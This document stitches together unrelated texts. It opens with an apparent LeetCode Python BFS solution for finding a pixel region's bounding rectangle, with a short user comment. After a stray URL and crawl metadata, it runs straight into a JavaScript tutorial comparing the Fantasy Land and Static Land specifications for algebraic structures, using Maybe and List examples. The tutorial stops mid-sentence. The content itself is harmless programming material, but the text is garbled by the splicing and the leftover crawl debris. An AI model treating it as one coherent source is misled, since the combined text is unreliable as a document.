class Solution(object): def minArea(self, image, x, y): """ :type image: List[List[str]] :type x: int :type y: int :rtype: int """ top, left = float("inf"), float("inf") bot, right = -1, -1 image[x][y] = None q = collections.deque([(x, y)]) while q: x, y = q.pop() top, left = min(x, top), min(y, left) bot, right = max(x, bot), max(y, right) for x0, y0 in (x-1, y), (x+1, y), (x, y-1), (x, y+1): if 0 <= x0 < len(image) and 0 <= y0 < len(image[0]) and image[x0][y0] == "1": image[x0][y0] = None q.appendleft((x0, y0)) return (right - left + 1) * (bot - top + 1) Many people will have the question: whey do we need x and y here ? The reason is, instead of O(mn) time, where the image can be very big, we only need O(nOfPixel) Time if we have x ,y, we do BFS and found the topLeft corner and botRight corner of this rectangle, top is the smallest x value ever observed in BFS, left is the smalles y value, similar for bot and right. Then, we got our rectangle after one BFS, wow, is this amazing :)
https://discuss.leetcode.com/user/younghuman
CC-MAIN-2018-22
refinedweb
197
68.64
Hi the first question is, how can I set a min and max for the rand function. At the moment i'm seeding from ctime then using It picks a number between 0 and 100 then if its too high it sets the max integer to the number just guessed. How can I change the min one.It picks a number between 0 and 100 then if its too high it sets the max integer to the number just guessed. How can I change the min one.Code:int theNumber = rand() % max + 1 My second question is: How can I make it so it adds to my shopListCount when the vector gets pushed back.How can I make it so it adds to my shopListCount when the vector gets pushed back.Code:#include <iostream> #include <string> #include <vector> using namespace std; int main() { string input; const int MAX_ITEMS = 10; int inventoryCount = 0; string inventory[MAX_ITEMS]; vector<string> shopList; int shopListCount = 0; shopList.push_back("Sword") && (shopListCount++); shopList.push_back("Shield" && (shopListCount++); shopList.push_back("Firewood") && (shopListCount++); cout << "Welcome to Ben's Test RPG, input inventory if you want to see what you own, type quit to leave aand type shop to see the shop" << endl; do { cin >> input; if(input == "inventory") if(inventoryCount != 0) for (int i=0; i < inventoryCount; i++) cout << inventory[i]; else cout << "Sorry you have no items." << endl; if(input == "shop") for (int j=0; j < shopListCount; j++) cout << shopList[j]; if(input == "quit") ; else cout << "Sorry incorrect choice."; }while(input != "quit") } Thanks, Ben
https://cboard.cprogramming.com/cplusplus-programming/93023-few-questions.html
CC-MAIN-2017-04
refinedweb
255
80.21
msgrcv - XSI message receive operation [XSI] #include <sys/msg.h>#include <sys/msg.h> ssize_t msgrcv(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg); The msgrcv() function operates on XSI message queues (see XBD -1 shall shall be decremented by 1. - msg_lrpid shall be set to the process ID of the calling process. - msg_rtime shall be set to the current time, as described in IPC General Description. Upon successful completion, msgrcv() shall return a value equal to the number of bytes actually placed into the buffer mtext. Otherwise, no message shall be received, msgrcv() shall return -1, XSI Interprocess Communication. - . Receiving |gsnd, sigaction XBD Message Queue, <sys/msg.h> First released in Issue 2. Derived from Issue 2 of the SVID. The type of the return value is changed from int to ssize_t, and a warning is added to the DESCRIPTION about values of msgsz larger the {SSIZE_MAX}. The note about use of POSIX Realtime Extension IPC routines has been moved from FUTURE DIRECTIONS to the APPLICATION USAGE section. The normative text is updated to avoid use of the term "must" for application requirements. POSIX.1-2008, Technical Corrigendum 1, XSH/TC1-2008/0398 [345] and XSH/TC1-2008/0399 [421] are applied. return to top of pagereturn to top of page
https://pubs.opengroup.org/onlinepubs/9699919799/functions/msgrcv.html
CC-MAIN-2019-47
refinedweb
214
57.16
"default property alias content" under QML Designer - sraboisson Hello everybody, I saw a strange behavior under QML Designer when using "default property alias content" I tried to locate an existing issue about this point, but without success, and i'd like to have your feedback if i'm doing right. I'm using the "default property alias content" in a QML (see the following example that reproduces the problem): Note: It's working correctly under QMLViewer => no error Panel.qml: @import QtQuick 1.0 Rectangle { id: aPanel width: 100 height: 100 radius: 5 color: "darkGray" default property alias content: aPanelCenter.children Rectangle { id: aPanelCenter clip: true color: "darkBlue" anchors.fill: parent anchors.topMargin: 6 anchors.bottomMargin: 6 anchors.leftMargin: 6 anchors.rightMargin: 6 } }@ MainComponent.qml: @import QtQuick 1.0 import "UI" Rectangle { width: 300 height: 300 color: "black" Panel { id:mainPanel x:50 y:50 Rectangle{ id:aRectangle x:36 y:63 width: 300 height: 50 color: "Green" } } }@ The point is that I don't have the same rendering under QML designer and QML Viewer: The "default property alias content" seems to be ignored under QML Designer. The object "aRectangle" should be created as a child of "aPanelCenter", and clipped by it, am i wrong ? But it's only the case under QML Viewer, and the state preview on top of QML Designer. But NOT in the central view of QML Designer ! Do I do something wrong with this "default property alias content", is it a known limitation, or a bug of QML Designer ? Hope someone could help... ;) - ThomasHartmann This is a bug/missing feature in the Qt Quick Designer. We handle these cases (The margins of aPanelCenter should be reflected.), but we do not handle the different clipping setting. Since the clipping is done by the form editor itself and the state previews are rendered differently the bug only appears in the form editor.
https://forum.qt.io/topic/15825/default-property-alias-content-under-qml-designer
CC-MAIN-2018-30
refinedweb
315
57.37
Obtain all IP addresses of local machine Environment: Compiled on: Visual Studio .NET & Windows XP Pro. Code works on any Windows machine. You're obviously writing TCP/IP applications. You have the ability to create sockets and bind them to specific ports. You may bind to all the ports, you may bind to 127.0.0.1, or finally you may want to bind to specific IP addresses of your local machine. Attached is the code required to simply start up winsock in a Windows environment, and enumerate all the IP addresses on your local machine. It is a console application, no MFC, not much Windows specific code. It has been tested in a Windows XP Professional environment, along with a Windows 2000 Server environment. We enumarate all the IPs until the list terminates (with a NULL pointer). It should have no problems working with Windows 95/98/Me/2k/XP/CE. I also tested it in our server environment where we have 32 IP addresses and we have software listening on the same port on different IPs, all located on the one NIC card that has access to the internet. In fact we are hosting listening servers on port 80 along side IIS. This requires you to disable socket pooling, but that is another story. If you have any questions, don't hesitate to e-mail me. #include <stdio.h> #include <WinSock.h> #pragma comment(lib, "wsock32.lib") int main(int argc, char *argv[]) { WORD wVersionRequested; WSADATA wsaData; char name[255]; PHOSTENT hostinfo; wVersionRequested = MAKEWORD( 1, 1 ); char *ip; if ( WSAStartup( wVersionRequested, &wsaData ) == 0 ) if( gethostname ( name, sizeof(name)) == 0) { printf("Host name: %s\n", name); if((hostinfo = gethostbyname(name)) != NULL) { int nCount = 0; while(hostinfo->h_addr_list[nCount]) { ip = inet_ntoa(*( struct in_addr *)hostinfo->h_addr_list[nCount]); printf("IP #%d: %s\n", ++nCount, ip); } } } return 0; } DownloadsDownload demo project - 28.0 Kb Download source - 28.0 Kb Linux - Version ?Posted by Urlaub in Ungarn on 11/03/2012 12:29pm Hi is there a version running on linux avaible?Reply question regarding modification to above codePosted by Legacy on 12/16/2003 12:00am Originally posted by: Avi GetIpAddressPosted by Legacy on 05/18/2003 12:00am Originally posted by: tom cruz Works with Windows XP and 2000Posted by Legacy on 07/19/2002 12:00am Originally posted by: Vikram Jairam It enumerates all the active IP Addresses on your computer just as the author promises. Really useful if you want to write a daemon that manages port-IP combinations on the same machine. Helped a lot. Thanks KhaledReply Doesn't Work On W2K SERVER....Posted by Legacy on 06/03/2002 12:00am Originally posted by: Phan Tien Vu Doesn't Quite Work In W2K or XPPosted by Legacy on 05/06/2002 12:00am Originally posted by: Shaun Staley It works ok when the computer is connected to the network. However, as soon as you unplug the cable from the network, XP & 2000 says the cable is unplugged. When that happens, it gives you an IP address of 127.0.0.1. Is there any fix for this? ThanksReply MACPosted by Legacy on 03/26/2002 12:00am Originally posted by: Jeff How can you get the MAC address for each IP?Reply Not C#Posted by Legacy on 03/25/2002 12:00am Originally posted by: Khalid Shaikh Small problem guys, This isn't C#. :( It is C++. I can look into C# if everyone is so excited about it. 11:02AM PST, Monday March 25 Okay guys, I just wrote up the C# version. It is kind of cool having a side by side C++ implementation as well! :P Going to submit it.Reply GreatPosted by Legacy on 03/23/2002 12:00am Originally posted by: barry ya ! that was really great & good.Reply
http://www.codeguru.com/csharp/csharp/cs_network/article.php/c6045/Obtain-all-IP-addresses-of-local-machine.htm
CC-MAIN-2014-41
refinedweb
637
65.62
Hi all again, I'm now in my 3rd week of my C++ course and I have a few little issues I need explained to me. The Hangman game in question is NOT supposed to be functional yet. It's an generic exercise in classes in which Hangman will be MY final project come the 9th week. So, I'm getting an early start. Note: it compiles without errors but it's just missing certain 'cout' streams. Questions and Concerns 1. Why doesn't my 'char Menu::getSelection()' from my menu.cpp not display the cout stream? That's all I need it to do, for now. 2. Unsure if my 'showHiScore()' (which I hard-coded for display purposes only) is written correctly. I don't even get the cout stream. Any advice in this will be greatly appreciated. 3. This one is just a nuisance, really: When the console program runs, I get "class Menu - Inside of 'Menu' default constructor" displayed twice. Why does it appear twice when the Menu constructor is defined only once within menu.cpp? Please take a look at my code: Menu.h #ifndef Menu_h #define Menu_h #include <iostream> using namespace std; class Menu { public: Menu(); //Default Constructor void showTitle(); //Displays name of game void showMenu(); //Displays menu void showSelection(); //Shows user the selections such as New Game and Load Game char getSelection()const; //Get user selection (accessor - getter) void setSelection(char); //Sets user selection (mutator - setter) char sel; //variable to hold user selection }; #endif //Menu_h Menu.cpp #include "Menu.h" #include <iostream> using namespace std; Menu::Menu() { cout <<"class Menu - Inside of 'Menu' default constructor\n" <<endl; } void Menu::showTitle() { cout <<"\n\nclass Menu showTitle() H-A-N-G-M-A-N" <<endl; } void Menu::showMenu() { //showMenu() definition } void Menu::showSelection() { cout <<"\n\nclass Menu showSelection() - Please enter your selection: " <<endl; cout <<"A." <<endl; cout <<"B." <<endl; cout <<"C." <<endl; //showSelection() definition } char Menu::getSelection() const { cout <<"\nclass Menu - getSelection() will return the user's selection"; return sel; //getSelection() definition } void Menu::setSelection(char sel) { char selection = sel; //Stores user's selection in 'sel' variable. //Declares 'selection' as stored variable 'sel' } Derive.h #ifndef Derived_h #define Derived_h #include "Menu.h" #include <iostream> #include <string> using namespace std; class Derived: public Menu { public: Derived(); //Default constructor void showMenu(); //Overrides showMenu() from base class 'Menu' int showHiScore(int num); }; #endif Derived.cpp #include "Menu.h" #include "Derived.h" #include <iostream> using namespace std; Derived::Derived() { cout <<"class Derived - Inside the 'Derived' constructor" <<endl; } void Derived::showMenu() { cout <<"\n\n\t\tCLASS DERIVED (overridden)Menu: showMenu()" <<endl; cout <<"\t\t******************************************" <<endl; cout <<"\n<---- Menu under construction at this time---->" <<endl; //showMenu() overridden 'base class' definition } int Derived::showHiScore(int num) { cout <<"\nInside the Class Derived showHiScore()" <<endl; int HiScore = 1000; return HiScore; } Main.cpp #include "Menu.h" #include "Derived.h" #include <iostream> #include <string> using namespace std; int main() { Menu class1; //Constructor - creates 'class Menu' object Derived class2; //Constructor - creates 'class Derived' object class1.showTitle(); class2.showMenu(); //Displays overridden menu class1.showSelection(); //Show user selection from class Menu class1.getSelection(); //Retrieves user selection char sel; //Declares 'sel' variable cin >> sel; //Stores user selection in 'sel' class1.setSelection(sel); //Sets user selection from stored variable in 'sel' class2.showHiScore(1000); //class Derived - puts HiScore listed as 1000 for the purposes of this exercise return 0; }
https://www.daniweb.com/programming/software-development/threads/289363/fake-hiscore-confusion-in-hangman
CC-MAIN-2018-13
refinedweb
557
57.06
The problem with strings decoding (Python) There is a server written in C++ by another developer using ICE 3.7 I do not have the source code of the server, therefore it is impossible to change something in server code. I am writing a client program in Python. My program get data from server for further work. I get data using the ice interface in string format. This is where i have a problem. The server does not write data for the client using utf-8, but uses Winsows-1251. Because in the received data present the characters of the national alphabet, an exception occurs when decoding in the Python client program ('utf-8' codec can't decode byte 0xd1 in position 3: invalid continuation byte) Here is the code of functions automatically generated in the Python module using slice2py: def moduleInfo (self, type, uid, context=None): return _M_Server.Server._op_moduleInfo.invoke(self, ((type, uid), context)) Server._op_moduleInfo = IcePy.Operation('moduleInfo', Ice.OperationMode.Normal, Ice.OperationMode.Normal, False, None, (), (((), _M_Server._t_ModuleType, False, 0), ((), IcePy._t_int, False, 0)), (), ((), IcePy._t_string, False, 0), ()) Is it possible to somehow specify the encoding, in which the server sends data, in the client function? Thanks for your answers. Answers Hi Igor, The client cannot specify the server encoding for strings, you will have to install a string converter plug-in to convert a string from and to Windows-1251 encoding. see: The plug-ins are C++ but will work with the Python mapping as it is built on top of the C++ runtime. Cheers, Jose Jose, thank you for your answer. I tried the proposed solution, but it didn't work. I use the windows operating system for development. I used the same code as in the “converter " example from the ice 3.6 repository. This is the Python code, that I used to initialize string converter: `initData.properties.setProperty(“Ice.Plugin.IceStringConverter”, “Ice:createStringConverter windows=1251”) ... communicator = Ice.initialize(sys.argv,initData)` Unfortunately, I got the same error. I noticed that the documentation says that the stringConverter works only with Python 2.Is it correct? Maybe that's the problem. I'm using Python 3. Is there any solution of my problem for Python 3? Thank you. I see, I first mistunderstood your problem, the string converter will not help you in this case, Ice expects that all the strings on the wire are encoded as UTF8 if an application uses a different encoding for the strings it can use the string converter plug-in to automatically convert the strings to UTF8 before marshal them. In python3 you cannot use a string converter because the mapping uses Unicode objects. I don't see a workaround for the server sending non-UTF8 strings
https://forums.zeroc.com/discussion/46741/the-problem-with-strings-decoding-python
CC-MAIN-2022-05
refinedweb
458
57.87
, today I trid to install a brandnew MW 1.20.2 with SMW 1.8.4. After copying the files from validator and smw to extensions path and adding the lines to localsettings.php there is no SMW section in the special pages. Special:Version shows validator and SMW to be installed. There are no errors as i can see. error_reporting( -1 ); ini_set( 'display_errors', 1 ); is in localsettings.php. Another Wiki (MW 1.18.1 and SMW 1.7.x) runs fine on the same server. I am Admin on the Wiki. So where is the mistake ? Hey Andy, I had a quick look at this and created a bug report to keep track of the issue here: Cheers -- Jeroen De Dauw Don't panic. Don't be evil. -- Hello Everyone, I am pleased to announce that the Semantic MediaWiki of the month for March 2013 is the Domotiki. Domotiki is a collaborative website that aims to bring together all the knowledge, information, information in the field of automation for including hardware, software, protocols, dealers, installers and builders. Congratulations to the Domotiki team for all of your hard work and thank you for sharing your wiki with us. As always, please do not forget to nominate your wiki. Just follow the instructions here:. Thanks, -Desi The forceshow parameter in Semantic Maps doesn't work, so which means that if the query has zero result, the map doesn't show. It is a problem because I want a map whether there's a query result or not. So far I don't have a good workaround. The default parameter (to show a map with display_point) seemed to work when there's no query, but a map won't show if there's a query. The next best thing I can think of is to use #if parser functions, which would mean running the query twice (first is to test whether it is valid) and then run again to show the query. I think this is rather an inefficient way to do it. Andy Hi Michael, Your setting of $smwgNamespacesWithSemanticLinks might have just been incorrect - I would try this instead: $smwgNamespacesWithSemanticLinks[1010] = true; -Yaron On Thu, Feb 28, 2013 at 10:06 AM, Michael Alaimo <malaimo923@...>wrote: > Please assist if you can. For some reason when using a custom namespace > the semantic method for declaring properties does not work. Default > MediaWiki namespaces do work. > > Is there a configuration setting that I need to utilize? > > I have this configuration in my LocalSettings.php of the MediaWiki > installation. > > $wgExtraNamespaces = array(1010 => 'Acts'); > > > $smwgNamespaceIndex = 100; > > require_once( $IP.'/extensions/DataValues/DataValues.php'); > require_once( $IP.'/extensions/Validator/Validator.php'); > require_once( $IP.'/extensions/SemanticMediaWiki/SemanticMediaWiki.php' ); > enableSemantics('localhost'); > > $smwgNamespacesWithSemanticLinks = > array_merge($smwgNamespacesWithSemanticLinks, $wgExtraNamespaces); > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > > _______________________________________________ > Semediawiki-user mailing list > Semediawiki-user@... > > -- WikiWorks · MediaWiki Consulting · I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
https://sourceforge.net/p/semediawiki/mailman/semediawiki-user/?viewmonth=201303&viewday=1
CC-MAIN-2017-17
refinedweb
527
59.8
timesfunction) How do you measure the time taken by a program, or a program fragment? The general approach is simple (pseudocode): time time_thing(f) { time t1 = now(); do_thing(); time t2 = now(); return t2-t1; } The subtlety is in the semantics of your now function. As it turns out, C has many functions available to get the “current time”. The obvious one is gettimeofday: #include <sys/time.h> int gettimeofday(struct timeval *restrict tp, void *restrict tzp); // The system's notion of the current Greenwich time and the current time zone But gettimeofday is inappropriate for measuring the running time of your process. gettimeofday measures “wall-clock time”, which means you get a lot of noise due to other system activity, such as other processes and the kernel. There is another function called times, which has another notion of “current time”: the amount of time “charged” to the current process since it began. The kernel “charges” processes by keeping a counter of how much CPU time they have used. #include <sys/times.h> struct tms { clock_t tms_utime; // amount of CPU time charged to current process clock_t tms_stime; // amount of CPU time charged to kernel on behalf of current process // ... }; void times(struct tms * buf); // Fill buf with current process charge Notice the counters distinguish between time charged to the process, and time charged to the kernel on behalf of that process. The latter might include things like: setting up connections, setting up kernel queues. I wrote this because I felt like it. This post is my own, and not associated with my employer.Jim. Public speaking. Friends. Vidrio.
https://jameshfisher.github.io/2016/12/26/c-times.html
CC-MAIN-2019-18
refinedweb
267
68.4
Quality type for traditional Sanger and modern Illumina Phred scores. More... #include <seqan3/alphabet/quality/phred42.hpp> Quality type for traditional Sanger and modern Illumina Phred scores. The phred42 Quality alphabet represents the zero-based Phred score range [0..41] mapped to the consecutive ASCII range ['!' .. 'J']. It therefore can represent the Illumina 1.8+ standard and the original Sanger score. If you intend to use Phred scores exceeding 41, use the larger score types, namely seqan3::phred63 or seqan3::phred94, otherwise on construction exceeding scores are mapped to 41. Via seqan3::qualified, you can combine a nucleotide alphabet with the Phred score to save space. All dna and rna combinations with seqan3::phred42 still fit into a single byte, e.g. seqan3::qualified<seqan3::dna4, seqan3::phred42> (4 * 42 = 168 values can be stored in a single byte which can contain up to 256 values). Allow construction from the Phred score value. The seqan3::phred42 string literal. You can use this string literal to easily assign to std::vector<seqan3::phred42>: The seqan3::phred42 char literal. You can use this char literal to assign a seqan3::phred42 character: The projection offset between char and rank score representation. The projection offset between Phred and rank score representation.
https://docs.seqan.de/seqan/3-master-user/classseqan3_1_1phred42.html
CC-MAIN-2021-21
refinedweb
207
50.53
Finally an affordable and easy EDI solution For years EDI solution have been expensive and time consuming to implement, requiring extensive programming assistance to the end user for the mapping of documents and integration into the customers ERP system. With EDIView for TaskCentre implementation cost is dramatically reduced by the introduction of the interactive tool for mapping the EDI documents, the Interchange Editor. With the Interchange Editor you don't need a programmer to spend endless hours mappping the documents. Instead a consultant or a skilled end user can map a document in a few hours. The easy to use editor enables mapping of standard EDI files like EDIFACT, TradaCom, VICS and many others. Standard mappings for many documents are available on request which makes setting up EDIView for TaskCentre even easier. EDIView for TaskCentre not only maps traditional EDI documents but also character separated documents, fixed length documents and XML documents. Also you can define any kind of translation from one document type to another, eg. You can translate an EDI document into an XML document, if that is, what you can import into your ERP system. When the document is mapped, integration with the ERP system is simple matter of drag and drop of fields into the Interchange. Despite the easy to use interface, the system still enables you to create user defined data conversion as part of the ERP Integration if needed, enabling you to implement very customer specific needs. Gone are the days where the system determines the level of integration with the ERP system. EDIView for TaskCentre uses the standard ERP connectors from TaskCentre to connect to a long range of ERP systems. With the other tools of TaskCentre there are endless possibilities to set up additional actions during the creation or import of EDI documents. Examples of additional tasks you can do is sending an email in case of an error during conversion or starting an approval workflow upon reception of a new order. Included in the EDIView for TaskCentre you also find tools to connect to the WorldVAN for direct easy upload and download of EDI Files from the VAN. You can have a look here, at some examples we already have done with EDIView for TaskCentre. A small introductional video
http://dimensionsoftware.dk/solutions/ediview-for-taskcentre.aspx
CC-MAIN-2015-32
refinedweb
378
50.26
Klout Klock - Using Netduino to display your Klout It's been about a thousands years (well many seconds at least...) since our last XNA post, it's been ages since we've had a game (well since a few posts ago) and a good while since we've done Windows Phone 7... well... um... err.... um... okay, okay... fine. Still I thought this was a cool XNA game for the Windows Phone that talked about something I've not seen covered much, the conversion from a much older Windows version using Managed DirectX to Windows Phone 7 and XNA. Also I liked how this project showed off the "standing on shoulders of giants" concept with how it leveraged some other open source code snips. And who doesn't want to play an Invasion game on your Windows Phone 7.x where you have all the source? Invasion Game in XNA for Windows Phone 7 Invasion is a UFO-shooter game, originally designed by Mauricio Ritter. This article describes my port of the Invasion game for Windows (in C# and Managed-DirectX) to Windows Phone 7 (C# and XNA 4.0). The full source code is provided. Back in 2002, Mauricio Ritter posted his "Invasion" UFO-shooter 2D game on CodeProject. It was written in C++ and used the DirectDraw APIs in DirectX 7 that Microsoft removed in DirectX 8. The following year, Steve Maier ported the game to C# with Managed DirectX and also posted it here on CodeProject. Managed DirectX went away after 2005 and was replaced by XNA. Both of those legacy versions ran on Windows XP. This article describes my 2011 week-long port of Steve's Managed DirectX version to Windows Phone 7 using XNA 4.0. I had some goals for porting this game beyond "just get it working on Windows Phone 7". Specifically, they were: - Redesign the code into more manageable classes - Make the code more readable so that beginners could understand it - Simplify the code by using more C# language features and XNA framework classes - Polish the game so that I could release it on the Windows Phone Marketplace - Keep it free and Open-Source - But still finish the port within a week! Considering my timeframe (which I extended by a few days), I was only somewhat successful. I submitted v1.0 to the Marketplace today and consider it a "work-in-progress". I had mentioned other open source projects? Borrowed Open Source Code There were some features that I wanted to add to the game and fortunately had some already-made code files that made adding them quick and easy. You can find these files in the ImproviSoftnamespace's Diagnostics, Drawing, and Systemprojects. Don't let the namespace fool you though, this code is free Open-Source and my company (ImproviSoft) didn't write much of it. The files contain comments with their source indicated - primarily Microsoft's XNA team, XNAWiki.com, and Elbert Perez of OccasionalGamer.com. So thank them for it! Here's a list of those files: - FrameRateCounter.cs - displays the frames/second onscreen for debugging purposes, from Shawn Hargreaves (Microsoft XNA team). - SimpleShapes.cs - class for drawing 2D primitives (e.g., a Rectangle), from XNAWiki.com (although probably named something else there). - Accelerometer.cs - class for handling accelerometer input, from create.msdn.com (Microsoft XNA team). - Camera2D.cs - class for handling a 2D camera (to make the screen shake!), from Elbert Perez of OccasionalGamer.com - thanks, Elbert! - InputState.cs - class for handling all sorts of input devices, including the touch-screen, from create.msdn.com (Microsoft XNA team). - MusicManager.cs - class for playing background music, from create.msdn.com (Microsoft XNA team). - RandomManager.cs - simple class for generating random numbers - OK, I possibly wrote this and it took just two minutes. - SoundManager.cs - simple class to wrap SoundEffect.Playcalls for sounds with adjusted maximum-volume. - VibrationManager.cs - class for making the phone vibrate on command (for force-feedback effect), from create.msdn.com (Microsoft XNA team). Here's a snap of the Solution; And finally a snap of it running in the emulator...
https://channel9.msdn.com/coding4fun/blog/Invasion-Game-for-Windows-Phone-7
CC-MAIN-2017-34
refinedweb
685
66.33
Fantasy land is great. It provides a standard naming convention for these things called algebraic structures. It allows a single function to work with a plethora of structures. No modification required. And it gets better. We don’t even have to write the functions. Libraries like Ramda are already compliant. So we have this whole world of interoperable functions and structures open to us. The title ‘fantasy land,’ though originally a joke, is quite fitting. Trouble in Fantasy Land Fantasy land isn’t perfect though. And it’s not the only way to do algebraic structures in JavaScript. Some of the trouble with fantasy land comes from its implementation. It assumes that we use objects and methods for everything. And that’s a totally reasonable way to do things. But it’s not the only way. And it has some drawbacks. Name conflicts and namespacing One of the drawbacks is name conflicts. Early versions of fantasy land had straightforward method names. That is, names like: equals, concat, empty, map, of, reduce, sequence, chain, extend, and extract. Many of the names were based on existing JavaScript interfaces, like Array methods. But, as Scott Sauyet put it, the trouble is “these are very common English words, with many meanings.” So it’s easy to run into problems if you’re working in a domain that uses those names in a different context. For example, you might be creating a geospatial application. In that context, map might have a different meaning. That might seem like a trivial example, but it comes up more often than anyone would like. To avoid this, the fantasy land authors agreed to namespace all the method names. So now, instead of calling x.map(f), we now call x['fantasy-land/map'](f). It solves the conflict problem. But it’s not pretty. It makes the specification hard to read. And it makes the methods inconvenient to type manually. All in all, it’s not much fun. Now, this isn’t quite as bad as it sounds. That is, it’s not so bad if you understand the intent of Fantasy Land. You see, Fantasy Land isn’t really intended for us mere mortals. Instead, it’s intended for use by library authors. The idea being, us mortal programmers shouldn’t need to type these method names by hand. The expectation is that we’d be using a library like Ramda. So instead of something like this: import Maybe from 'my/maybe/library/somewhere'; const noStupid = s => (s.includes('stupid')) ? Maybe.Just(s) : Maybe.Nothing; // These namespaced method calls look silly. const title = new Maybe('Yes, this is a silly example'); const sentence = title['fantasy-land/map'](s => `${s}.`); const validSentence = sentence['fantasy-land/chain'](noStupid); With Ramda, we would pull in functions like map(), chain() and pipe() to manipulate our structures: import Maybe from 'my/maybe/library/somewhere'; import {chain, map, pipe} from 'ramda'; const noStupid = s => (s.includes('stupid')) ? Maybe.Just(s) : Maybe.Nothing; // Note the lack of method calls in our pipe(). Much prettier. // But, we did have to pull in the whole Ramda library to make // it happen. const title = new Maybe('Yes, this is a silly example'); const validSentence = pipe( map(s => `${s}.`), chain(noStupid), )(title); As you can see, once we introduce Ramda, all the Fantasy Land prefixes disappear. So namespaces aren’t so bad, right? We don’t have to worry about them anymore. Ramda just takes care of it. Everyone’s happy, yes? Except, those prefixes aren’t gone. They’re just hidden. And they keep poking their little heads out. For example, consider Maybe.of(). With the namespace prefix it becomes Maybe['fantasy-land/of']. It’s a static method. So there’s no Ramda function for that. This means that if we want to use that static method, we’re stuck writing out the prefix. That, or we write our own alias for it. And that’s OK. But not much fun. None of this is the end of the world. It’s just inconvenient. It’s friction. And it would be nice if there was less friction. Wrapping and unwrapping values The other drawback Fantasy Land has is all the wrapping and unwrapping. To make things work with Fantasy Land we’re forever wrapping up values inside objects. And sometimes, it’s objects inside objects, inside objects. And that’s not much fun either. Most of the time, it’s all fine. But at some point, we need to work with something outside our world of algebraic structures. Perhaps a DOM element or React component. Or even a database connection. Here, we have two options: - Unwrap values out of our algebraic structures somehow, or - Wrap the outside thing into a fantasy-land structure. Either way, we’re either wrapping or unwrapping somewhere. This wrapping business is actually a good thing. Especially if you’re a beginner at functional programming. The wrapping and unwrapping forces you to think about types. That’s important in a loosey-goosey-typed1 language like JavaScript. For example, consider a simple implementation of Maybe. We can’t just concatenate a Maybe onto the end of a String. import Maybe from 'my/maybe/library/somewhere'; const valueIGotFromParsingJSON = new Maybe('Another silly example'); const sentencifiedTitle = valueIGotFromParsingJSON + '.'; // This doesn't work. If we want to get the value out of the Maybe container, we have to use something like .orElse(). import Maybe from 'my/maybe/library/somewhere'; const valueIGotFromParsingJSON = new Maybe('Another silly example'); const sentencifiedTitle = valueIGotFromParsingJSON.orElse('No title found') + '.'; Again, this is a good thing. It forces us to consider what happens if the value is null. And that’s the whole point of Maybe. We can’t fool ourselves into thinking that null isn’t a possibility. Similarly, Task forces us to think about what happens if an operation fails. And Either can force us to think about how we’re going to deal with exceptions.2 All good things. Still, wrapping and unwrapping creates drag. Once you’re more experienced, those objects can start to feel a little heavy. A good library like Ramda helps. And, as we saw earlier, once you have some good pipelines set up the containers start to disappear. But it’s still a drag. It’s not terrible. Just inconvenient. Particularly when wrapping things that are already objects, like DOM elements or Promises. They have their own set of methods. But to get at them you have to go via .map(), .ap() or .chain(). Not hard. Just a drag. An alternative So, Fantasy Land isn’t perfect. In fact, it can be a bit annoying at times. And some of that is JavaScript’s fault. But not all of it. Still, imagine if we could have algebraic structures without those drawbacks. What if there was a way to create structures without having to worry so much about name conflicts? And imagine if we didn’t have to wrap all our data in objects. We could work with strings, numbers or even DOM elements, just as they are. No wrapping or unwrapping. Algebraic structures with plain ol’ JS data types. Sound a bit fantastical? Well it’s real. It’s made possible by the Static Land specification. What’s Static Land then? Well, like Fantasy Land, Static Land is a specification for common algebraic structures. Fantasy Land assumes that you’re creating structures using objects and methods. But Static Land assumes you’re creating structures using plain ol’ JavaScript functions. But they must be static functions. That means that we can’t use the magic this keyword anywhere. We’re still free to have classes, objects and modules. We can group our functions together as we like. But the functions themselves can’t be methods. No this. Now, if you’ve had some training in computer science, that might sound regressive. Especially if you work with languages like C# or Java. In my university classes they taught us to move beyond those quaint static modules of the past. They taught us to embrace Object-Oriented Programming (OOP). The way of the future! So I spent a lot of time developing intuitions about classes and objects. That was the Best Practice™️ way to build programs. But, functional programming throws many of my old intuitions on their head. And Static Land gets the job done entirely with static methods. It’s great. An example What does a Static Land algebraic structure look like? Perhaps the best way to show this is by example. We’ll use static-land versions of Maybe and List (arrays), but we’ll do it using a real life kind of problem. A problem thousands of web developers are working on right this second. The problem is this: We have some settings data we got from a server somewhere. We want to put those values into a form on some kind of settings screen. That is, we’re making an HTML form. The task is sticking values in HTML form fields. And I’d estimate this is a large chunk of what most of us professional web developers do all day. Let’s look how a static land version of Maybe and List can help get it done. In our imaginary problem, we have not one, but two blobs of data. Perhaps we fetched them via an XHRequest. Perhaps we read them from a file. It doesn’t matter. The point is, we have two of them: - One blob of data to specify the form structure; and - One blob of data that has the values for the form. We want to take these two blobs, smush them together, and create some HTML representing our form. Here’s some sample data to show what I’m talking about. First, the form specification:', }, ], }, { id: 'comments', label: 'Comments', type: 'textarea', dflt: '', name: 'comments', }, { id: 'submitbtn', label: 'Submit', type: 'submit', }, ]; And second, the form data: const formValues = [ { id: 'person-name', value: 'Cheshire Cat', }, { id: 'person-email', value: 'cheshire.cat@example.com', }, { id: 'wonderland-resident', value: ['isresident'], }, ]; With these two data structures, we have enough information here to create some kind of form. List We’ve got a motivating example now. Let’s take a look at what a Static Land structure might look like. Here’s an implementation of List. It’s not the only way to implement List. And perhaps it’s not the best way to implement list. But it will do for now. // Curry function stolen from Professor Frisby's Mostly Adequate Guide // curry :: ((a, b, ...) -> c) -> a -> b -> ... -> c function curry(fn) { const arity = fn.length; return function $curry(...args) { if (args.length < arity) { return $curry.bind(null, ...args); } return fn.call(null, ...args); }; } // Unary takes a function and makes it ignore everything // except the first argument. // unary :: ((a, b, ...) -> c) -> a -> c function unary(f) { return x => f(x); } // The List implementation itself. const List = { // map :: (a -> b) -> List a -> List b map: curry(function map(f, xs) { return xs.map(unary(f)); }), // chain :: (a -> List b) -> List a -> List b chain: curry(function chain(f, xs) { return xs.flatMap(unary(f)); }), // ap :: List (a -> b) -> List a -> List b ap: curry(function ap(fs, xs) { return List.chain(f => List.map(f, xs), fs); }), // reduce :: (a -> b -> a) -> a -> List b -> a reduce: curry(function reduce(f, a, xs) { return xs.reduce(f, a); }), }; It doesn’t look like much, does it? We’re mostly just delegating to 